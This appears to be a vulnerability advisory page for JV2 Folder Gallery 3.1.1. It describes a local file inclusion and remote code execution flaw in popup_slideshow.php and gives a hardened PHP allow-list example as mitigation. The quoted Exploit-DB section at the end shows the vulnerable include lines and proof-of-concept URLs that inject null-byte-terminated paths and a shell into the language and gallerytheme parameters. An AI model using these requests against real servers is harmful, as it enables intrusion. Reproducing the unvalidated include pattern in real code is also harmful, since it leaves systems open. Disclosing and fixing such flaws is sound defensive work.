Vendor: JV2 Folder Gallery
By: eidelweiss
CVSS: 9.8 (HIGH)
Local File Inclusion (LFI) and Remote Code Execution (RCE)
CWE: 98
Product Name: JV2 Folder Gallery
Affected Version From: 3.1.1
Affected Version To: 3.1.1
Patch Exists: NO
Related CWE: N/A
CPE: JV2 Folder Gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Web
2020

JV2 Folder Gallery 3.1.1 (popup_slideshow.php) Multiple Vulnerability

JV2 Folder Gallery 3.1.1 is vulnerable to Local File Inclusion (LFI) and Remote Code Execution (RCE). The vulnerable code is in the popup_slideshow.php file: after its fixed includes (such as config/file_handling.php), it includes a language file and a gallery theme file whose paths are built from the language and gallerytheme values without proper validation. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The attacker can use the LFI vulnerability to include a malicious file from the local system or a remote system. The attacker can also use the RCE vulnerability to execute arbitrary code on the vulnerable system.

Mitigation:

The application should validate user input and filter out any malicious code. The application should also use a whitelist of allowed characters and reject any input that does not match the whitelist.
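
One way to apply this mitigation to the two dynamic includes in popup_slideshow.php, as an added example that is not part of the advisory or of JV2 Folder Gallery: the value is checked against an allow-list of characters, the resolved path must stay inside the expected directory, and anything else falls back to a default. The function name, the default names (english, default) and the temporary directory tree are assumptions made for the example.

```php
<?php
// Added example, not JV2 Folder Gallery code. Hardened counterpart of
//   include ("config/lang/".$language.".php");
//   include ("theme/".$gallerytheme."/config.php");
// safe_component_path() and the sample directory tree are hypothetical.

function safe_component_path(string $baseDir, $name, string $suffix, string $default): string
{
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException("base directory missing: $baseDir");
    }
    // 1. Allow-list of characters: rejects "/", "\", ".", NUL bytes, URL schemes and arrays.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $name)) {
        $name = $default;
    }
    // 2. Canonicalise and confirm the result is a file inside the base directory.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . $suffix);
    if ($path === false || !is_file($path)
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        // 3. Unknown name: fall back to the configured default, never to user input.
        $path = realpath($base . DIRECTORY_SEPARATOR . $default . $suffix);
        if ($path === false) {
            throw new RuntimeException("default component missing: $default");
        }
    }
    return $path;
}

// Constructed directory tree standing in for config/lang/ and theme/.
$root = sys_get_temp_dir() . '/gallery_demo_' . getmypid();
@mkdir("$root/config/lang", 0700, true);
@mkdir("$root/theme/default", 0700, true);
file_put_contents("$root/config/lang/english.php", "<?php // constructed\n");
file_put_contents("$root/config/lang/german.php", "<?php // constructed\n");
file_put_contents("$root/theme/default/config.php", "<?php // constructed\n");

// Constructed request values: the first is valid, the rest must fall back to the default.
$samples = ['german', 'klingon', '../galleryconfig', "english\0", 'http://example.invalid/x', ['a']];
foreach ($samples as $value) {
    $lang = safe_component_path("$root/config/lang", $value, '.php', 'english');
    printf("%-32s -> %s\n", json_encode($value), basename($lang));
}
$theme = safe_component_path("$root/theme", '../config/lang', '/config.php', 'default');
echo "theme -> ", basename(dirname($theme)), "/config.php\n";
// In the application, include only the returned path: include $lang; include $theme;
```

The character check alone already blocks path separators and the trailing NUL byte; the realpath() containment check is a second layer in case the allow-list is later loosened.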
Source

Exploit-DB raw data:

-----------------------------------------------------------------------------------
JV2 Folder Gallery 3.1.1 (popup_slideshow.php) Multiple Vulnerability
-----------------------------------------------------------------------------------
Vendor:		www.foldergallery.jv2.net
download:	http://foldergallery.jv2.net/Download/
Author:		eidelweiss
Thank`s:		All Friends & All Hacker`s

-----------------------------------------------------------------------------------

	-=[ Vuln Code ]=-

[-] /path/gallery/gallery/popup_slideshow.php

<?php 
include ("config/gallerysetup.php");
include ("config/galleryconfig.php");
include ("config/file_handling.php");
include ("config/lang/".$language.".php");	// <= 1
include ("theme/".$gallerytheme."/config.php");	// <= 2

-----------------------------------------------------------------------------------

	-=[ P0C ]=-

	http://127.0.0.1/path/gallery/popup_slideshow.php?language= [LFI]%00

	http://127.0.0.1/path/gallery/popup_slideshow.php?gallerytheme= [LFI]%00

	http://127.0.0.1/path/gallery/popup_slideshow.php?gallerytheme= [inj3ct0r shell]

=========================| -=[ E0F ]=- |=========================